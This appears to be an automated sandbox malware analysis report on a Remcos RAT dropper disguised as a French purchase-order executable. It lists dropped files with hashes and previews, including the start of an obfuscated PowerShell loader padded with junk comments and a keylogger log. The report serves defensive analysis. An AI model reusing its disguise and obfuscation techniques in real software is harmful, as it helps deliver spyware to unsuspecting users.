                                                      SSDEEP:96:pwpIitkXkkXfkuguW0O0QV0Qg0Qg20QXX0QC0Qb69gVXm2szeuzSzbxGQI5CmKsK:pgle+upOt1oeyOkNmF
                                                      MD5:10E8A120AFD7C63C60309911BE2151CB
                                                      SHA1:12A1360D0744CE2BCF3B3E24FC0DAEA6ADEA2B45
                                                      SHA-256:44B36A780E5F4DDBB67A531E93117F15B89CCEFB7B508B60CF79390555B8C86D
                                                      SHA-512:F007EE94AFB64C4A8DCA15ADE8301BA5DFA970FDFD198ED2C2A69F090258D326FF391A0CBE0DBDBACAE67AE3223EF9181F51A58BD8B05337FE4C45B4D59E25BC
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.1.4.6.8.3. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WERE028.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2347909255314224
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguW+0QU0Q10QgN0QXH0Q40QBrtgjXGhPszeuzSzbxGQI5zmesK:pjle+uzRwoeyOkNLF
                                                      MD5:F48DC545F5A57BAB931C9A1985EC43B0
                                                      SHA1:2137CAC0D256E8529C9496ACB88CDE19386A8594
                                                      SHA-256:A6AE5A8E584666596233894D3E13229169015EE0D3BE0279CC8E75F6B5091C0A
                                                      SHA-512:F86BFE29323DF3E302339A94E38BBA03096D7020598FC02BC7A76A606EC0266822C6BF8C22C552CBC0C3896D47C0D018D96CE51CC3E4A5D0B9002CF7E4099132
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.4.0.4.1.0. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WERE047.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2313309032570565
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguW10Qg0Qb0Qgj0QXm0Qg0QYrgYgwXSZszeuzSzbxGQI5zm08y:pjle+uwX/oeyOkNtd
                                                      MD5:73D255CC171CC754EE5E0666754C66DB
                                                      SHA1:BC2A1108B8DD2FAA80AB11484C02D3A51BABB370
                                                      SHA-256:BE9BD1FF21B1BAE41F19E0D2C860A5E5331B7BA40D9D34FBE047D4C5E241A678
                                                      SHA-512:A288A3D4C243DFCD78817BD314434E3C72F7353F99F4F17126C563E6158FF8046AD1E4A234B484FDE03C6C9C1B8EA14B3A6B6FBB009ED59CC39F76F1A4863034
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.0.8.5.1.9. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\WERF47B.tmp.WERDataCollectionStatus.txt

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.239045266160915
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWT0Q40Qc0QgZv0QXa0Qr0QtzNhg8XZLszeuzSzbxGQI5Cm+F:pgle+u7p6oeyOkNSF
                                                      MD5:A421D411E3980B25CAAADC6DD580A9C8
                                                      SHA1:26DAD6CFF8C444F8DF532E01C393D942FC49F3C5
                                                      SHA-256:C4AA417FCDBACD99330096DA903AFA2228CC13307B392EAB063BD51A757913BF
                                                      SHA-512:CF94C786B7DFDB61A27624A39ABFB7EA07F99AA2BB1B3C6D755EFAFF6DA88921988C82452441CBB661FF08FB583B99579E82992F7A6957E4298EF980C655169E
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.6.1.6.5.6.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cw1bqf5m.igo.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl5vznuf.nwt.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\nsi820F.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):408873
                                                      Entropy (8bit):7.618522049007463
                                                      Encrypted:false
                                                      SSDEEP:12288:P2cR6xsOAMzlI3mHDvokHaO5U5r4QK+/e4coLjO4rZ2EK/:PT8zBjAkHaOUH3O+Z25
                                                      MD5:ADDC8AD98D1A3FF426E4045CF514D3EC
                                                      SHA1:0B5F4BFF209FF218386A7D5B62CD099253A4B005
                                                      SHA-256:E7B09720ABE4127C6CB04AEAB03B9C634395D5F41BE4A6AA88F488BD996480B8
                                                      SHA-512:F8C802371B7509989B626462ED383FE7E5C2F92DD23A5332EA49411B0267832E6C28E2D95158B1752F11A275426E09FDC7D9D8D13FC0DD4E27E1ED929C143CCD
                                                      Malicious:false
                                                      Preview:........,...................6...............................................................................................................................................................................................................................................................J...o...............j...............................................................................................................................~.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):561426
                                                      Entropy (8bit):7.108663972875578
                                                      Encrypted:false
                                                      SSDEEP:12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9
                                                      MD5:EDEB34F392872F3C9E220BC9DCF9BA86
                                                      SHA1:E9FB6FF7CD47EC7B08391F4C1ECC1E684BF28FF7
                                                      SHA-256:39E37A6736984B617A47818FFDBD202199C75F769821D4939F1D61DFF621098D
                                                      SHA-512:F33BC39692838CC94AE0ED6AEDDDFCECB8FD564DE6DE0D81A258ECE57EBA04CB7820F1FE834E48B4E0CBCE95409449514BB645E69584AD62E0439FEA306AF424
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 26%
                                                      • Antivirus: Virustotal, Detection: 27%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................`...............................................s....... ...4...........................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...............r..............@....ndata.......@...........................rsrc....4... ...6...v..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\lerret.txt

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:ASCII text, with very long lines (409), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):409
                                                      Entropy (8bit):4.269623571994858
                                                      Encrypted:false
                                                      SSDEEP:6:dHBe6/CfTF/MKFJJ2VVYOeCVdHkQs5kUrL7iDu41l7W9ADhEATE1MhdyK+ivv:dheFfTFjFJYRs5fLmDugl73DrmavfH
                                                      MD5:16234C20D3324265BB707C0DA0A316F8
                                                      SHA1:994ABB6985951CE456AF1468C3A74BBE53D2348A
                                                      SHA-256:75F66C61F6AE6C8E75466D750D71DB4385ABBBE93C9C5677D9DF74B5F741F99C
                                                      SHA-512:B50103F5820889FB40A397A727AE64FBB91A1D02C6CA341B00FAE3EF11FCC02C858F24CAF18B35991D4197789D3EDD3C068842A0E3D2F9B1293E35E8FD5AD733
                                                      Malicious:false
                                                      Preview:chuffer udenlandsk unthinkable tjrerne,udfri recepturens lituiform taimi borstall salgsinformation fejlplaceres.meddelelsesmiddelet languisher wileproof degami kammerherreinder epitheloid arith,cabbing naturfarvet xanthochroi voldgraven.araucarioxylon flageolettone redd bykologi debitorkontoen blinddrenes brevstemtes.stellular tintie recontested andenklasseskupkderne ansaas spotlights undersgelsesomraadet,

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\underholdshjlp.sca

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2830
                                                      Entropy (8bit):4.838170566476968
                                                      Encrypted:false
                                                      SSDEEP:48:nJxVhlYzClcqDye0Wr/yp00EoYSR/8Wc2nqIjoMSj6yoPPOiWFenjA9Eljyr/Q:nlhlYWry/Sm3EE+EnKMSGfuNeSElGro
                                                      MD5:90A8F9376B587851CE0CF60BD203101F
                                                      SHA1:5833830004E7017DA574A4F3C69D27874C28F400
                                                      SHA-256:770970BF93905583E7305F1E80755C0582D0B01009BCBB8CEA0FA6BD28E9D645
                                                      SHA-512:98FA1DAE524D113E1736AD371AC7C8FF3FDCD959B4612B714A57BD36F180C42430CD199D1B98A48529B322CED110A68C7F80E18252D2A1CB4BAB08AF58EBE5D1
                                                      Malicious:false
                                                      Preview:...y.E....:......~................PW......*~...-U.............ci.....0.^,...........t............O.r.......(..K.....1.... ...Lf)........+............s;.......E.....C".O....."..?`..n.............]....qs.............e.d........h.N....Q2...r..bq............!l.....8........z.......S........g.2.#..,:...p.?.............*.............6...s....4......G....Mz....c....l..O...6.......... ..........6........Q.[..@0...?.*.-....B.....,.....?..e........3........f{.$......,]@..P...H....#..3rV..Et...5....k.M........J...F...Ni.......xnJ...l.i.....'4>"R............oQ..q..!.........1..IN................a..........._..........U.m.....K.............q........?..r...........>.3.....R.......Z.3..........1..U..X>b....E....?..0.............Hs...............Y..o.8...n...............D....>..p....g.j...e....L..........`...l.%mq...........L.&...A.].M......^............+.....p............A..!.p.y..........E......W.4.....{.....'...."4......d~...5....+........../3.`....J.........U.........'.^.................,...

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\registerforvaltningers\Bryllupsmarchens\befolkningstallets.tnd

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2999
                                                      Entropy (8bit):4.923587551956379
                                                      Encrypted:false
                                                      SSDEEP:48:SNwJkKO6C9omNsm4bYelK0Lzqi2QF/cHn81RY3FfAqK/M5LLbR4lAbe8GU5nHkzG:BJu6mpOkVK23FJK/UFoge8G2Hka
                                                      MD5:C2D8CAB2DF0C5184A51CAD4F321A64CC
                                                      SHA1:2068EC7CBEE9BB22651B84CDFDB5258B62EA95EE
                                                      SHA-256:21DFA4EABFF3CA8CF50F2AD48AB42EB1616B76DCBCDAE86705A4FFC204A36258
                                                      SHA-512:0D521DF41C6C415FAA84244F153CFD653574356F21AE55A9CDBC24B7A8825454A661483A1405BB3AE71F067C7BFE7D1A4E729AFC23A5346C36A524329A28D37B
                                                      Malicious:false
                                                      Preview:..........._..x.2.y6.N.+5......y..ewe.......;u........v......;2.....O....=.8i.....l........-.......#.......rn......c2J...[.7.......x..?..q............./=...........&.......j..........`..n..O.`....E.#.....>..............U.....................E....<.y...z....6.U..............m.y..........#M.'..............B..Z......m../..B..!......................}...g.7........,.>........l..............;$...c..m...5.=......h.j*...'W..........*..........P..l....{.....=Q......yX.......1....Nns........'.....\.u.....r..k.....:'....0............N$).....QY......8Z..k.........J....7.M.......9\3....M.e....y0.{....s..z.F.....X.Y.%....".6.....A.J.....M...........Q.?.e.G....T....{.A...@"........r....|.b.i......6........... ......U......j............F}..........l...z.(......a@...]...I......R......Z...q.....|.........o.;...o.....x..#.....`.o..q....j..S.A.............k.-II.z..f..............?........p.............2.P...........A...... ........F....y...~....1......*V.......w,.........^...w.(.GL|..T..}..J......U.

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:ASCII text, with very long lines (57941), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57941
                                                      Entropy (8bit):5.366975130385102
                                                      Encrypted:false
                                                      SSDEEP:1536:M2JnexhWTLwrzAPNCVjXRFnhoMMesE5FxGFlAqfq+7:MGghWPwrMeh9b2ELxGFl77
                                                      MD5:19779840EECFC141420A08CB9A741962
                                                      SHA1:0F0A168BC292914DA146F667557FF5F07B0F5AE5
                                                      SHA-256:DE1FC8DC64B49C5AE8C2C9C45E7DD4D2AA154F845E99A8E8FA08B5ABF23D38A7
                                                      SHA-512:D3BE08E433F93BAFC5D53EA6E91C53E01D755BF1C61E4006AA184DA35644B343BD72D0DDBEE9820DB107C2DF212DC4A51A4E06EBF3CF6C1E45ED250F2B383723
                                                      Malicious:true
                                                      Preview:$Recitativos=$eksperimentalteatresntrffendes;<#Produktionsreglen Starttilstandens Oceanologien interpolationen Jernbanearbejdere Inviolable Evolutionistens #><#Subtropic Conformator Fagald Spinogalvanization Nether Maracock deployeret #><#Markedstallene Samejes Sveskegrd #><#Pneumococcal Danielson Bulbed Nattevagt Centilongs Phoneticise #><#Gawkers Hummerkdet Sugefoden Afsiges Edeotomy Smudsafvisendes Marlenes #><#Skralds Nodosarian Robinsonadens Tannaic Knibtangsbevgelsen #><#Straightforwardest Forebow Amorph Quininises tvrvidenskabelig Energiagenturer Tabulerede #><#Toadish Keweenawan Bgespinder Attesteret Ladakin #><#Cerianthid Underinddelte Podsolized Ligbleges Mishandle Silverite #><#Virussets Spydskes Theosophic #><#Frimrkesamleres Amyridaceae Communes #><#Parkeringslygternes Mycelier ndringsforsg Sdedes Euphorbium #><#Incompetence Regionplanretningslinie Stiftelsesoverenskomsternes Variolization Asketernes Unpunctually #><#Prodisarmament Yderigeres Phlegmaticness Caoutchoucin Ud

                                                      C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Raciality.Fly

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339396
                                                      Entropy (8bit):7.680669650160453
                                                      Encrypted:false
                                                      SSDEEP:6144:Vg2nMcR6xsO57WM9Z+a+Ii3D66xODvok9RaO3JtwL5gWwA76WwQK+/eKk7EcorXX:V2cR6xsOAMzlI3mHDvokHaO5U5r4QK+b
                                                      MD5:4FEF7EC4AA88C70E0E50AF8288552883
                                                      SHA1:93FB76EB5D63D8BD92CB962E8F6CA7C8E7AE5950
                                                      SHA-256:286B9DF7B42E7F021BB5EEBE1B6E00D6178F01A4B308244CABFD955CD91B5D60
                                                      SHA-512:9F386415243A791B58853C00C378AA57D3AA69F3E690E452220DA92D5B4888A0C35099B20EBC9672B0797BCD58091FCA8D1F0BD75A616B164896531B8206B1CB
                                                      Malicious:false
                                                      Preview:.....C.%%%%......::::..I....5.......].===..................D....................=.'..SSS.......;...&&.....!!!!.........,,.N...7.......i..........T.........HHH.................w.^..................................FF...mmm.|..........K.....333333...$..WW....r...................*.....?..&&&&......._.......66.......ss.M.................YY..n...kkkkk.........||.7.4444.........f.hh...........PP...........OOOOO..aa.mmm........... .............................L.........................c.......kk.............................'....333...........'.....................VVVV.....5.k.........r............s......,,..s............b..........e.?...................22....l............y..H.....m.......A.S.)....5.<<<..-.....................P..........%..............k..........77...............E..=......."..Z.........................M.kk..........2.......e..................==...........qqq..0.rr..[...........c........ii...............''......................?????......H. .....BBBBB..........................

                                                      C:\Users\user\AppData\Roaming\mqerms.dat

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.30006269448478
                                                      Encrypted:false
                                                      SSDEEP:6:6l+H5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lsec0WFe5BWFe5BW+
                                                      MD5:4A2695C75A24110CD5F7A4598D75F7EF
                                                      SHA1:C6D6F9042A471B85A04869EDEB46004C647AFDA9
                                                      SHA-256:704C44B71289C2D89E2C36EE68916DEA5566A70E67822BC6BA653E9B980963E8
                                                      SHA-512:324CFEB68F6D62EEFC921D087D82EB6982829E22B04149ECFD61B504D6DAAF1C4E0B740757C31D5AEDE8CF5AE2F56956F9CEF970334B2ECE633FEE5861095856
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                                      Preview:....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.4.:.2.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.469220245977231
                                                      Encrypted:false
                                                      SSDEEP:6144:fGzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNHjDH5S:AZHtYZWOKnMM6bFpFj4
                                                      MD5:27DBC1AC5722F0D395E90393B957E538
                                                      SHA1:75B17AA81CE8A0AFDEA63F972AE7B37D3EBBFB3C
                                                      SHA-256:2F61F4E1BD7B4FDF724EC95AD257C7ED5615359179451A2D4385F43FE9427BB0
                                                      SHA-512:13B4EA1006663DC77BE1EB122A06EDE4E7B2B22EA1E61CCC28022A951B529D19BEE58E7E9EF90F2EFFF819AFBE58770183012783359C5C679E904CDBA34DCC16
                                                      Malicious:false
                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmzu.................................................................................................................................................................................................................................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.108663972875578
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File size:561'426 bytes
                                                      MD5:edeb34f392872f3c9e220bc9dcf9ba86
                                                      SHA1:e9fb6ff7cd47ec7b08391f4c1ecc1e684bf28ff7
                                                      SHA256:39e37a6736984b617a47818ffdbd202199c75f769821d4939f1d61dff621098d
                                                      SHA512:f33bc39692838cc94ae0ed6aedddfcecb8fd564de6de0d81a258ece57eba04cb7820f1fe834e48b4e0cbce95409449514bb645e69584ad62e0439fea306af424
                                                      SSDEEP:12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9
                                                      TLSH:BBC4DF213764D46BD2022A778954E6CCAB64ED902F2C87537E18BF6F7D2BB4B1CD0261
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@

                                                      File Icon

                                                      Icon Hash:9a8d265b6d2f8141

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403217
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x536FD798 [Sun May 11 20:03:36 2014 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
